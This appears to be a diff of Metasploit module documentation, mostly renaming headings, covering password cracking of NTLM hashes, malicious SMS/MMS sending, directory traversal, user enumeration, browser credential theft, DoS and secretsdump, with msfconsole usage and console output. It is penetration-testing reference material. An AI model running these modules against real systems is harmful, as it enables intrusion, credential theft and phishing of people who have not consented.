-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:lm_password ntlm:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C jtr:lm
-creds add user:nt_password ntlm:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C jtr:nt
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_windows_fast 
-msf5 auxiliary(analyze/jtr_windows_fast) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-koittz
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-1v82lkm
-[*] Cracking lm hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-Using default target encoding: CP850
-Warning: poor OpenMP scalability for this hash type, consider --fork=8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:00 DONE (2019-02-11 19:34) 0g/s 1177Kp/s 1177Kc/s 1177KC/s PLANO..VAGRANT
-Session completed
-[*] Cracking lm hashes in single mode...
-Using default input encoding: UTF-8
-Using default target encoding: CP850
-Warning: poor OpenMP scalability for this hash type, consider --fork=8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:02 DONE (2019-02-11 19:34) 0g/s 4634Kp/s 4634Kc/s 4634KC/s WAC1907..E1900
-Session completed
-[*] Cracking lm hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-Using default target encoding: CP850
-Warning: poor OpenMP scalability for this hash type, consider --fork=8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:00 DONE (2019-02-11 19:34) 0g/s 41152Kp/s 41152Kc/s 41152KC/s 0766269..0769743
-Session completed
-[*] Cracked Passwords this run:
-[+] lm_password:password
-[*] Cracking nt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking nt hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking nt hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] lm_password:password
-[+] nt_password:password
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_windows_fast) > creds
-Credentials
-===========
-
-host  origin  service  public       private                                                            realm  private_type  JtR Format
-----  ------  -------  ------       -------                                                            -----  ------------  ----------
-                       lm_password  password                                                                  Password      
-                       lm_password  e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
-                       nt_password  password                                                                  Password      
-                       nt_password  aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
-
-```

documentation/modules/auxiliary/client/mms/send_mms.md

@@ -1,10 +1,12 @@
+## Vulnerable Application
+
 The ```auxiliary/client/mms/send_mms``` module allows you to send a malicious attachment to a
 collection of phone numbers of the same carrier.
 
 In order to use this module, you must set up your own SMTP server to deliver messages. Popular
 mail services such as Gmail, Yahoo, Live should work fine.
 
-## Module Options
+## Options
 
 **CELLNUMBERS**
 
@@ -74,7 +76,7 @@ in order to receive the text, such as AT&T.
 
 The MMS subject. Some carriers require this in order to receive the text, such as AT&T.
 
-## Supported Carrier Gateways
+### Supported Carrier Gateways
 
 The module supports the following carriers:
 
@@ -84,14 +86,14 @@ The module supports the following carriers:
 * Verizon
 * Google Fi
 
-## Finding the Carrier for a Phone Number
+### Finding the Carrier for a Phone Number
 
 Since you need to manually choose the carrier gateway for the phone numbers, you need to figure out
 how to identify the carrier of a phone number. There are many services that can do this, such as:
 
 http://freecarrierlookup.com/
 
-## Gmail SMTP Example
+### Gmail SMTP Example
 
 Gmail is a popular mail server, so we will use this as a demonstration.
 
@@ -111,7 +113,7 @@ After creating the application password, configure auxiliary/client/mms/send_mms
 
 And you should be ready to go.
 
-## Yahoo SMTP Example
+### Yahoo SMTP Example
 
 Yahoo is also a fairly popular mail server (although much slower to deliver comparing to Gmail),
 so we will demonstrate as well.
@@ -136,7 +138,7 @@ After configuring your Yahoo account, configure auxiliary/client/mms/send_mms th
 
 And you're good to go.
 
-## Demonstration
+## Scenarios
 
 After setting up your mail server and the module, your output should look similar to this:
 

documentation/modules/auxiliary/client/sms/send_text.md

@@ -1,10 +1,12 @@
+## Vulnerable Application
+
 The ```auxiliary/client/sms/send_text``` module allows you to send a malicious text/link to a collection
 of phone numbers of the same carrier.
 
 In order to use this module, you must set up your own SMTP server to deliver messages. Popular
 mail services such as Gmail, Yahoo, Live should work fine.
 
-## Module Options
+## Options
 
 **CELLNUMBERS**
 
@@ -57,7 +59,7 @@ The password you use to log into the SMTP server.
 
 The FROM field of SMTP. In some cases, it may be used as ```SMTPUSER```.
 
-## Supported Carrier Gateways
+### Supported Carrier Gateways
 
 The module supports the following carriers:
 
@@ -73,7 +75,7 @@ The module supports the following carriers:
 **Note:** During development, we could not find a valid gateway for Sprint, therefore it is currently
 not supported.
 
-## Finding the Carrier for a Phone Number
+### Finding the Carrier for a Phone Number
 
 Since you need to manually choose the carrier gateway for the phone numbers, you need to figure out
 how to identify the carrier of a phone number. There are many services that can do this, such as:
@@ -82,7 +84,7 @@ http://freecarrierlookup.com/
 
 **Note:** If the phone is using Google Fi, then it may appear as a different carrier.
 
-## Gmail SMTP Example
+### Gmail SMTP Example
 
 Gmail is a popular mail server, so we will use this as a demonstration.
 
@@ -100,7 +102,7 @@ After creating the application password, configure auxiliary/client/sms/send_tex
 
 And you should be ready to go.
 
-## Yahoo SMTP Example
+### Yahoo SMTP Example
 
 Yahoo is also a fairly popular mail server (although much slower to deliver comparing to Gmail),
 so we will demonstrate as well.
@@ -123,7 +125,7 @@ After configuring your Yahoo account, configure auxiliary/client/sms/send_text t
 
 And you're good to go.
 
-## Demonstration
+### Scenarios
 
 After setting up your mail server and the module, your output should look similar to this:
 

documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md

@@ -3,7 +3,7 @@ This module triggers a Denial of Service vulnerability in the Flexense Enterpris
 a write access memory vialation via rapidly sending HTTP requests with large HTTP header values.  
 
 
-## Vulnerable Application 
+## Verification Steps
 According To publicly exploit Disclosure of Flexense HTTP Server v10.6.24
 Following list of softwares are vulnerable to Denial Of Service.
 read more : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8065

documentation/modules/auxiliary/dos/http/ibm_lotus_notes.md

@@ -15,7 +15,7 @@ Vulnerable app versions include:
 
 Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999385
 
-## Verification
+## Verification Steps
 
 1. Start msfconsole
 1. `use auxiliary/dos/http/ibm_lotus_notes.rb`

documentation/modules/auxiliary/dos/http/ibm_lotus_notes2.md

@@ -15,7 +15,7 @@ IBM Notes 8.5 release
 
 Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999384 
 
-## Verification
+## Verification Steps
 
 Start msfconsole
 

documentation/modules/auxiliary/dos/http/webkitplus.md

@@ -55,7 +55,7 @@ at ../src/ephy-main.c line 432
 
 ```
 
-## Verification
+## Verification Steps
 
     Start msfconsole
     use auxiliary/dos/http/webkitplus

documentation/modules/auxiliary/gather/advantech_webaccess_creds.md

@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application
 
 This module exploits three vulnerabilities in Advantech WebAccess.
 
@@ -12,9 +12,6 @@ The final vulnerability exploited is that the HTML Form on the user edit page co
 plain text password in the masked password input box. Typically the system should replace the
 actual password with a masked character such as "*".
 
-
-## Vulnerable Application
-
 Version 8.1 was tested during development:
 
 http://advcloudfiles.advantech.com/web/Download/webaccess/8.1/AdvantechWebAccessUSANode8.1_20151230.exe
@@ -41,7 +38,6 @@ The username to use to log into Advantech WebAccess. By default, there is a buil
 The password to use to log into AdvanTech WebAccess. By default, the built-in account ```admin```
 does not have a password, which could be something you can use.
 
-
-## Demo
+## Scenarios
 
 ![webaccess_steal_creds](https://cloud.githubusercontent.com/assets/1170914/22353246/34b2045e-e3e5-11e6-992c-f3ab9dcbe716.gif)

documentation/modules/auxiliary/gather/browser_getprivateip.md

@@ -4,7 +4,7 @@ This module retrieves a browser's network interface IP addresses using WebRTC. H
 
 Related links : https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html
 
-## Verification
+## Verification Steps
 
     Start msfconsole
     use auxiliary/gather/browser_lanipleak

documentation/modules/auxiliary/gather/censys_search.md

@@ -1,4 +1,7 @@
-The module use the Censys REST API to access the same data accessible through web interface. The search endpoint allows searches against the current data in the IPv4, Top Million Websites, and Certificates indexes using the same search syntax as the primary site.
+## Vulnerable Application
+
+The module use the Censys REST API to access the same data accessible through web interface.
+The search endpoint allows searches against the current data in the IPv4, Top Million Websites, and Certificates indexes using the same search syntax as the primary site.
 
 ## Verification Steps
 
@@ -207,8 +210,3 @@ msf auxiliary(censys_search) > run
 [+] wesecure.nl - [997423]
 [*] Auxiliary module execution completed
 ```
-
-
-## References
-
-1. https://censys.io/api

documentation/modules/auxiliary/gather/kerberos_enumusers.md

@@ -9,7 +9,7 @@ accounts are enabled or disabled/locked out.
 To use kerberos_enumusers, make sure you are able to connect to the
 Kerberos service on a Domain Controller.
 
-## Scenario
+## Scenarios
 
 The following demonstrates basic usage, using a custom wordlist,
 targeting a single Domain Controller to identify valid domain user

documentation/modules/auxiliary/gather/nuuo_cms_bruteforce.md

@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application
 
 Nuuo CMS Session Bruteforce
 
@@ -49,8 +49,6 @@ Secondly, due to the nature of this application, it is normal to have the softwa
 
 It is worth noticing that when a user logs in, the session has to be maintained by periodically sending a PING request. To bruteforce the session, we send each guess with a PING request until a 200 OK message is received. 
 
-## Vulnerable Application
-
 [NUUO Central Management Server (CMS): all versions below 2.4.0](d1.nuuo.com/NUUO/CMS/)
 
  - 1.5.2 OK
@@ -73,9 +71,3 @@ msf5 auxiliary(gather/nuuo_cms_bruteforce) > exploit
 [*] Auxiliary module execution completed
 msf5 auxiliary(gather/nuuo_cms_bruteforce) >
 ```
-
-## References
-
-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
-
-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt

documentation/modules/auxiliary/gather/nuuo_cms_file_download.md

@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application
 
 Nuuo CMS Authenticated Arbitrary File Download
 
@@ -26,8 +26,6 @@ This module works in the following way:
 
 Due to the lack of ZIP encryption support in Metasploit, the module prints a warning indicating that the archive cannot be unzipped in Msf.
 
-## Vulnerable Application
-
 [NUUO Central Management Server (CMS): all versions up to and including 3.5.0](http://d1.nuuo.com/NUUO/CMS/)
 
 The following versions were tested:
@@ -63,9 +61,3 @@ msf5 auxiliary(gather/nuuo_cms_file_download) > exploit
 [*] Auxiliary module execution completed
 msf5 auxiliary(gather/nuuo_cms_file_download) >
 ```
-
-## References
-
-- https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
-
-- https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt

documentation/modules/auxiliary/gather/office365userenum.md

@@ -1,3 +1,5 @@
+## Vulnerable Application
+
 External python module compatible with v2 and v3.
 
 Enumerate valid usernames (email addresses) from Office 365 using ActiveSync.
@@ -14,9 +16,7 @@ Microsoft Security Response Center stated on 2017-06-28 that this issue does not
 
 This script is maintaing the ability to run independently of MSF.
 
-## Vulnerable Application
-
-  Office365's implementation of ActiveSync
+Office365's implementation of ActiveSync is vulnerable.
 
 ## Verification Steps
 
@@ -41,6 +41,7 @@ This script is maintaing the ability to run independently of MSF.
 
 
 ## Scenarios
+
 The following demonstrates basic usage, using the supplied users wordlist
 and default options.
 
@@ -72,6 +73,3 @@ grimhacker.com  ..        |
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
 ```
-
-## References
-https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/

documentation/modules/auxiliary/gather/samsung_browser_sop_bypass.md

@@ -1,10 +1,11 @@
-## Description
-This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the Samsung Internet Browser (CVE-2017-17692), a popular mobile browser shipping with Samsung Android devices. By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather credentials via a fake pop-up and the gather credentials is stored in `creds`
-
 ## Vulnerable Application
+
 This Module was tested on Samsung Internet Browser 5.4.02.3 during development.
 
+This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the Samsung Internet Browser (CVE-2017-17692), a popular mobile browser shipping with Samsung Android devices. By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather credentials via a fake pop-up and the gather credentials is stored in `creds`
+
 ## Verification Steps
+
 1. Start `msfconsole -q`
 2. `use auxiliary/gather/samsung_browser_sop_bypass`
 3. `set SRVHOST`
@@ -14,6 +15,7 @@ This Module was tested on Samsung Internet Browser 5.4.02.3 during development.
 5. `run`
 
 ## Scenarios
+
 ```
 $ sudo msfconsole -q
 msf > use auxiliary/gather/samsung_browser_sop_bypass
@@ -49,8 +51,6 @@ host            origin          service          public          private
 msf auxiliary(samsung_browser_sop_bypass) >
 ```
 
-## Demos
-
 Working of MSF Module: `https://youtu.be/ulU98cWVhoI`
 
 Vulnerable Browser: `https://youtu.be/lpkbogxJXnw`

documentation/modules/auxiliary/scanner/backdoor/energizer_duo_detect.md

@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan).
+More information can be found on the [Rapid7 Blog](https://blog.rapid7.com/2010/03/08/locate-and-exploit-the-energizer-trojan).
 Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.
 
 The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx).

documentation/modules/auxiliary/scanner/db2/discovery.md

@@ -1,5 +1,5 @@
 
-## About
+## Description
 
 This module simply queries the DB2 discovery service for information.
 The discovery service is integrated with the Configuration Assistant and the DB2® administration server.
@@ -12,9 +12,10 @@ Using the discovery method, catalog information for a remote server can be autom
 3. `set THREDS [number of threads]`
 4. `run`
 
-
 ## Scenarios
-- DB2 `9.07.2` running at a `RHEL 6.9` .
+
+### DB2 9.07.2 on RHEL 6.9
+
 ```
 msf auxiliary(scanner/db2/discovery) > set RHOSTS 192.168.1.25
 msf auxiliary(scanner/db2/discovery) > run

documentation/modules/auxiliary/scanner/ftp/easy_file_sharing_ftp.md

@@ -1,10 +1,10 @@
+## Vulnerable Application
+
 This module exploits a directory traversal vulnerability in Easy File Sharing FTP Server 3.6, or
 prior. It abuses the RETR command in FTP in order to retrieve a file outside the shared directory.
 
 By default, anonymous access is allowed by the FTP server.
 
-## Vulnerable Application
-
 Easy File Sharing FTP Server version 3.6 or prior should be affected. You can download the
 vulnerable application from the official website:
 
@@ -22,6 +22,6 @@ The FTP server IP address.
 
 The file you wish to download. Assume this path starts from C:\
 
-## Demonstration
+## Scenarios
 
 ![ftp](https://cloud.githubusercontent.com/assets/1170914/23971054/4fdc2b08-099a-11e7-88ea-67a678628e49.gif)

documentation/modules/auxiliary/scanner/http/advantech_webaccess_login.md

@@ -1,9 +1,7 @@
-## Description
+## Vulnerable Application
 
 This module allows you to authenticate to Advantech WebAccess.
 
-## Vulnerable Application
-
 This module was specifically tested on versions 8.0, 8.1, and 8.2:
 
 **8.2 Download**
@@ -23,7 +21,6 @@ Note:
 By default, Advantech WebAccess comes with a built-in account named ```admin```, with a blank
 password.
 
-
 ## Verification Steps
 
 1. Make sure Advantech WebAccess is up and running
@@ -34,6 +31,6 @@ password.
 6. ```run```
 7. You should see that the module is attempting to log in.
 
-## Demo
+## Scenarios
 
 ![webaccess_login_demo](https://cloud.githubusercontent.com/assets/1170914/22352301/26549236-e3e1-11e6-9710-506166a8bee3.gif)

documentation/modules/auxiliary/scanner/http/apache_userdir_enum.md

@@ -0,0 +1,42 @@
+## Vulnerable Application
+
+This module determines if usernames are valid on a server running Apache with the `UserDir` directive enabled. 
+It takes advantage of Apache returning different error codes for usernames that do not exist and for usernames
+that exist but have no `public_html` directory.
+
+### Enabling  `UserDir` on Ubuntu 16.04 with Apache installed
+1. `sudo a2enmod userdir`
+2. `sudo service apache2 restart`
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/apache_userdir_enum```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```run```
+
+## Scenarios
+
+### Apache 2.4.18 on Ubuntu 16.04
+
+![apache_userdir_enum Demo](https://i.imgur.com/UZanfTI.gif)
+
+```
+msf5 > use auxiliary/scanner/http/apache_userdir_enum
+msf5 auxiliary(scanner/http/apache_userdir_enum) > set rhosts alderaan
+rhosts => alderaan
+msf5 auxiliary(scanner/http/apache_userdir_enum) > run
+
+[*] http://192.168.6.172/~ - Trying UserDir: ''
+[*] http://192.168.6.172/ - Apache UserDir: '' not found
+[*] http://192.168.6.172/~4Dgifts - Trying UserDir: '4Dgifts'
+[*] http://192.168.6.172/ - Apache UserDir: '4Dgifts' not found
+...
+[*] http://192.168.6.172/~zabbix - Trying UserDir: 'zabbix'
+[*] http://192.168.6.172/ - Apache UserDir: 'zabbix' not found
+[*] http://192.168.6.172/~vagrant - Trying UserDir: 'vagrant'
+[*] http://192.168.6.172/ - Apache UserDir: 'vagrant' not found
+[+] http://192.168.6.172/ - Users found: backup, bin, daemon, games, gnats, irc, list, lp, mail, man, messagebus, news, nobody, proxy, sshd, sync, sys, syslog, uucp
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

documentation/modules/auxiliary/scanner/http/cisco_firepower_download.md

@@ -1,10 +1,9 @@
+## Vulnerable Application
+
 This module exploits a vulnerability found in Cisco Firepower Management console. A logged in
 user can abuse the report viewing feature to download an arbitrary file. Authentication is
 required to exploit this vulnerability.
 
-
-## Vulnerable Application
-
 This module was written specifically against Cisco Firepower Management 6.0.1 (build 1213) during
 development. To test, you may download the virtual appliance here:
 
@@ -26,6 +25,6 @@ admin:Admin123 by default:
 If the file is found, it will be saved in the loot directory. If not found, the module should
 print an error indicating so.
 
-## Demo
+## Scenarios
 
 ![cisco_download_demo](https://cloud.githubusercontent.com/assets/1170914/21782825/78ada38e-d67a-11e6-9b7b-c7b8e2956fba.gif)

documentation/modules/auxiliary/scanner/http/cnpilot_r_web_login_loot.md

@@ -9,7 +9,7 @@ The device has at least two (2) users - admin and user. Due to an access control
 3. Do: ```set RPORT [PORT]```
 4. Do: ```run```
 
-## Sample Output
+## Scenarios
 
   ```
 msf > use auxiliary/scanner/http/cnpilot_r_web_login_loot

documentation/modules/auxiliary/scanner/http/dir_scanner.md

@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application
 
 This module scans one or more web servers for interesting directories that can be further explored.
 

documentation/modules/auxiliary/scanner/http/glassfish_traversal.md

@@ -9,7 +9,7 @@ Related links :
 * https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904
 * http://download.oracle.com/glassfish/4.1/release/glassfish-4.1.zip - Download Oracle Glass Fish 4.1
 
-## Verification
+## Verification Steps
 
   1. Start msfconsole
   2. Do: ```use auxiliary/scanner/http/glassfish_traversal```

documentation/modules/auxiliary/scanner/http/http_put.md

@@ -11,7 +11,7 @@ This module can abuse misconfigured web servers to upload and delete web content
 6. Do: ```set FILEDATA [PATH]```
 7. Do: ```run```
 
-## Options 
+## Options
 
 ### ACTION
 

documentation/modules/auxiliary/scanner/http/iis_shortname_scanner.md

@@ -1,13 +1,15 @@
-
-## Microsoft IIS shortname vulnerability scanner
-
-The vulnerability is caused by a tilde character `~` in a GET or OPTIONS request, which could allow remote attackers to disclose 8.3 filenames (short names). In 2010, Soroush Dalili and Ali Abbasnejad discovered the original bug (GET request) This was publicly disclosed in 2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.
-
 ## Vulnerable Application
 
-Older Microsoft IIS installations are vulnerable with GET, newer installations with OPTIONS
-  
-  
+The vulnerability is caused by a tilde character `~` in a GET or OPTIONS request, which could allow remote attackers
+to disclose 8.3 filenames (short names). In 2010, Soroush Dalili and Ali Abbasnejad discovered the original bug (GET request)
+this was publicly disclosed in 2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.
+
+Older Microsoft IIS installations are vulnerable with GET, newer installations with OPTIONS 
+
+### Remediation
+
+Create registry key `NtfsDisable8dot3NameCreation` at `HKLM\SYSTEM\CurrentControlSet\Control\FileSystem`, with a value of `1`
+
 ## Verification Steps
 
   1. Install IIS (default installations are vulnerable)
@@ -51,13 +53,3 @@ Older Microsoft IIS installations are vulnerable with GET, newer installations w
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host
 ```
-
-## Remediation
-
-Create registry key `NtfsDisable8dot3NameCreation` at `HKLM\SYSTEM\CurrentControlSet\Control\FileSystem`, with a value of `1`
-
-
-## References
-
-  * https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability/
-  * https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability

documentation/modules/auxiliary/scanner/http/rips_traversal.md

@@ -12,7 +12,7 @@
   * [RIPS v0.54 Source](https://sourceforge.net/projects/rips-scanner/files/rips-0.54.zip/download)
 
 
-## Verification
+## Verification Steps
 
   1. Start `msfconsole`
   2. `use auxiliary/scanner/http/rips_traversal`

documentation/modules/auxiliary/scanner/http/springcloud_traversal.md

@@ -1,13 +1,11 @@
-## Description
+## Vulnerable Application
 
 This module exploits an unauthenticated directory traversal vulnerability, which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6.
 Spring Cloud Config listens by default on port 8888.
 
-### Vulnerable Application
-
 * https://github.com/spring-cloud/spring-cloud-config/archive/v2.1.1.RELEASE.zip
 
-## Verification
+## Verification Steps
 
 1. `./msfconsole`
 2. `use auxiliary/scanner/http/springcloud_traversal`
@@ -29,7 +27,3 @@ msf auxiliary(scanner/http/springcloud_traversal) > run
 [*] Auxiliary module execution completed
 msf auxiliary(scanner/http/springcloud_traversal) >
 ```
-
-## References
-
-* https://pivotal.io/security/cve-2019-3799

documentation/modules/auxiliary/scanner/http/totaljs_traversal.md

@@ -34,11 +34,15 @@ Affecting total.js package, versions:
 
 ## Options
 
-* **TARGETURI**: Path to Total.js App installation (“/” is the default)
-* **DEPTH**: Traversal depth (“1” is the default)
-* **FILE**: File to obtain (“databases/settings.json” is the default for Total.js CMS App)
+ **DEPTH**
 
-## Scenario
+  Traversal depth. Default is `1`
+
+ **FILE**
+
+  File to obtain. Default is `databases/settings.json`
+
+## Scenarios
 
 ### Tested on Total.js framework 3.2.0 and Total.js CMS 12.0.0
 

documentation/modules/auxiliary/scanner/http/tvt_nvms_traversal.md

@@ -0,0 +1,34 @@
+## Description
+
+This module exploits an unauthenticated directory traversal vulnerability which exists in TVT network surveillance management software-1000 version 3.4.1. NVMS listens by default on port 80.
+
+### Vulnerable Application
+
+* http://en.tvt.net.cn/upload/service/NVMS1000.zip
+
+## Verification
+
+1. `./msfconsole`
+2. `use auxiliary/scanner/http/tvt_nvms_traversal`
+3. `set rhosts <rhost>`
+4. `run`
+
+## Scenarios
+
+### Tested against Windows 7 SP1
+
+```
+msf5 auxiliary(scanner/http/tvt_nvms_traversal) > set RHOSTS 192.168.43.152
+RHOSTS => 192.168.43.152
+msf5 auxiliary(scanner/http/tvt_nvms_traversal) > run
+
+[+] File saved in: /root/.msf4/loot/20191230124941_default_192.168.43.152_nvms.traversal_240600.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/tvt_nvms_traversal) >
+```
+
+## References
+
+* https://www.exploit-db.com/exploits/47774
+* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20085

documentation/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.md

@@ -1,15 +1,11 @@
-## Description
+## Vulnerable Application
+
   This module attempts to authenticate against a Wordpress-site (via 
   XMLRPC) using username and password combinations indicated by the 
   `USER_FILE`, `PASS_FILE`, and `USERPASS_FILE` options.
 
-## References
-* [https://codex.wordpress.org/XML-RPC_Support](https://codex.wordpress.org/XML-RPC_Support)
-* [http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/](http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/)
-
-## Vulnerable Application
-
 ### Setup using Docksal
+
 Install [Docksal](https://docksal.io/)
 
 Create a new WordPress installation using `fin project create`

documentation/modules/auxiliary/scanner/msmail/exchange_enum.md

@@ -4,7 +4,7 @@ Exchange installations to enumerate email.
 
 Error-based user enumeration for Office 365 integrated email addresses
 
-## Verification
+## Verification Steps
 
 - Start `msfconsole`
 - `use auxiliary/scanner/msmail/exchange_enum`

documentation/modules/auxiliary/scanner/msmail/host_id.md

@@ -11,7 +11,7 @@ OWA (Outlook Webapp) is vulnerable to time-based user enumeration attacks.
 
 **Note:**  Currently uses RHOSTS which resolves to an IP which is NOT desired, this is currently being fixed 
 
-## Verification
+## Verification Steps
 
 - Start `msfconsole`
 - `use auxiliary/scanner/msmail/host_id`

documentation/modules/auxiliary/scanner/msmail/onprem_enum.md

@@ -6,7 +6,7 @@ OWA (Outlook Webapp) is vulnerable to time-based user enumeration attacks.
 
 **Note:**  Currently uses RHOSTS which resolves to an IP which is NOT desired, this is currently being fixed 
 
-## Verification
+## Verification Steps
 
 - Start `msfconsole`
 - `use auxiliary/scanner/msmail/onprem_enum`

documentation/modules/auxiliary/scanner/portscan/xmas.md

@@ -13,7 +13,7 @@ Detects a closed port via a RST received in response to the FIN
   XMAS scan requires the use of raw sockets, and thus cannot be performed from some Windows
   systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges.
 
-# Options
+## Options
 
   **PORTS**
   
@@ -34,7 +34,7 @@ Detects a closed port via a RST received in response to the FIN
   Gives detailed message about the scan of all the ports. It also shows the
   ports that were not open/filtered.
 
-# Verification Steps
+## Verification Steps
 
   1. Do: `use auxiliary/scanner/portscan/xmas`
   2. Do: `set RHOSTS [IP]`
@@ -42,7 +42,7 @@ Detects a closed port via a RST received in response to the FIN
   4. Do: `run`
   5. The open/filtered ports will be discovered, status will be printed indicating as such.
 
-# Scenarios
+## Scenarios
   
 ### Metaspliotable 2
 

documentation/modules/auxiliary/scanner/scada/profinet_siemens.md

@@ -57,7 +57,7 @@ IP, Subnetmask and Gateway are: 172.16.30.102, 255.255.0.0, 172.16.0.1
 [*] Auxiliary module execution completed
 ```
 
-## Module Options
+## Options
 ```
 msf auxiliary(profinet_siemens) > show options
 

documentation/modules/auxiliary/scanner/smb/impacket/dcomexec.md

@@ -31,7 +31,7 @@ Currently supported objects are:
   module user to view the output but also causes it to be written to disk before
   it is retrieved and deleted.
 
-## Scenario
+## Scenarios
 
 ```
 metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/dcomexec) > show options 

documentation/modules/auxiliary/scanner/smb/impacket/secretsdump.md

@@ -9,7 +9,7 @@
 1. Set: `RHOSTS`, `SMBUser`, `SMBPass`
 1. Do: `run`, see hashes from the remote machine
 
-## Scenario
+## Scenarios
 
 ```
 metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/secretsdump) > show options 

documentation/modules/auxiliary/scanner/smb/impacket/wmiexec.md

@@ -18,7 +18,7 @@
   module user to view the output but also causes it to be written to disk before
   it is retrieved and deleted.
 
-## Scenario
+## Scenarios
 
 ```
 metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/wmiexec) > show options 

documentation/modules/auxiliary/scanner/snmp/cnpilot_r_snmp_loot.md

@@ -7,7 +7,7 @@ Cambium cnPilot r200/r201 devices can be administered using SNMP. The device con
 3. Do: ```set COMMUNITY public```
 4. Do: ```run```
 
-## Sample Output
+## Scenarios
 
   ```
 msf > use auxiliary/scanner/snmp/cnpilot_r_snmp_loot

documentation/modules/auxiliary/scanner/snmp/epmp1000_snmp_loot.md

@@ -11,7 +11,7 @@ Note: If the backup url is not retrieved, it is recommended to increase the TIME
 3. Do: ```set COMMUNTY [SNMP_COMMUNUTY_STRING]```
 4. Do: ```run```
 
-## Sample Output
+## Scenarios
 
   ```
 msf > use auxiliary/scanner/snmp/epmp_snmp_loot

documentation/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.md

@@ -1,6 +1,6 @@
 Some TLS implementations handle errors processing RSA key exchanges and encryption (PKCS #1 v1.5 messages) in a broken way that leads an adaptive chosen-chiphertext attack. Attackers cannot recover a server's private key, but they can decrypt and sign messages with it. A strong oracle occurs when the TLS server does not strictly check message formatting and needs less than a million requests on average to decode a given ciphertext. A weak oracle server strictly checks message formatting and often requires many more requests to perform the attack.
 
-## Vulnerable Applications
+## Vulnerable Application
 
 * F5 BIG-IP 11.6.0-11.6.2 (fixed in 11.6.2 HF1), 12.0.0-12.1.2 HF1 (fixed in 12.1.2 HF2), or 13.0.0-13.0.0 HF2 (fixed in 13.0.0 HF3) (CVE 2017-6168)
